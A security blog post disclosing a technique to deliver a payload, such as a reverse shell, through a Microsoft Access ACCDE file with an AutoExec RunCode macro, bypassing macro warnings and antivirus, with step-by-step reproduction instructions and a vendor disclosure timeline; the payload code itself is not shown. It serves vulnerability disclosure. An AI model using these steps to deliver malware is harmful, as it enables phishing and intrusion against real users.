MAccess– Bypassing Office macro warnings

a new attack technique for penetration testers, using Microsoft Office and ACCDE file

Posted by Kaiosec Group. January 04, 2018

Daniel Levi, the founder of Kaiosec Security Consulting discovered a new attack technique for penetration testers using Microsoft Office and ACCDE file.

One of the most popular ways for hackers to launch their attacks is using a malicious Microsoft office file like Word or PowerPoint.

Delivering a malicious macro is not always an easy task due to many Microsoft security features.

For example, a downloaded file opens in a protected view:

Microsoft Office protected view

Another example is that any file conatining a macro will prompt a secuity warning before executing:

Macros have been disabled

Microsoft Access Macro

Microsoft Access is a DMBS with GUI and it's part of Microsoft Office:

Microsoft Access

It’s looks like all others Office products, therfore Daniel decided to investigate it and found a way to deliver a malware without any macro alerts and no anti-virus is detecting it:

NoDistrubite Scan

We did not use any kind of obfuscation, this method is unknown and therfore no AV suspects this file.

Daniel discovered that Microsoft Access allows users to create Macro named "RunCode" that will execute evil function.
Exporting the file as executable ACCDE will bypass the macro security warnings and the evil code will execute automatically.

Reverse Shell PoC:

Reproduction steps:

Open Microsoft Access and click ALT + F11 to open visual basic, then click Tools > Macros.
Enter your macro Name and click Create:

Create Macro Make sure your access file is selected at "Macros In:"

Now comes the fun part, create a function with your payload:

Payload Function

Press CTRL + S to save and return to Access.

Click on Create > Macro:

Create Macro-2

Search for RunCode:

RunCode

In the Function Name type the function you wrote in visual basic, mine is kaiosec()

Click "CTRL + S" to save the macro and type "AutoExec" as the macro name, this will insure that the macro will execute automatically.

Last step

We created a macro that is executing our malicious function but there is still the "Protected View" & "Enable Content" warning messages.

We found that we may bypass these warnings by saving the Access file as executable only:
File > Save As > Make ACCDE.

RunCode This will insure that no macro warning will show up

Timeline:

  • Nov 12 – Reported to Microsoft.
  • Nov 14- Microsoft answered that they are investigating the report.
  • Nov 14 – Microsoft sent questions about the vulnerability.
  • Nov 15 – Answers and a PoC file sent to Microsoft.
  • Nov 16 – Microsoft passed the information onto Engineering.
  • Dec 6 – I asked for updates.
  • Dec 9 – Microsoft respond that it's been going back and forth actively between Engineering and the product team.

  • 29 Dec - Microsoft consider this as "by-design" issue and therefore, they will not modify this behavior via security update.

For any question, please do not hesitate to contact, Daniel | daniel@kaiosec.com

Update:


After posting the article above, someone sent to us the following link:

http://www.rvrsh3ll.net/blog/phishing/phishing-for-access/

The article at the link (by Steve Borosh) talks about the same vulnerability, it posted at Dec 2, we reported on this to Microsoft at Nov 12 (Before the article was published) and we were waiting for Microsoft to close the case until Dec 29, at this time Steve found it as well, Good job ;)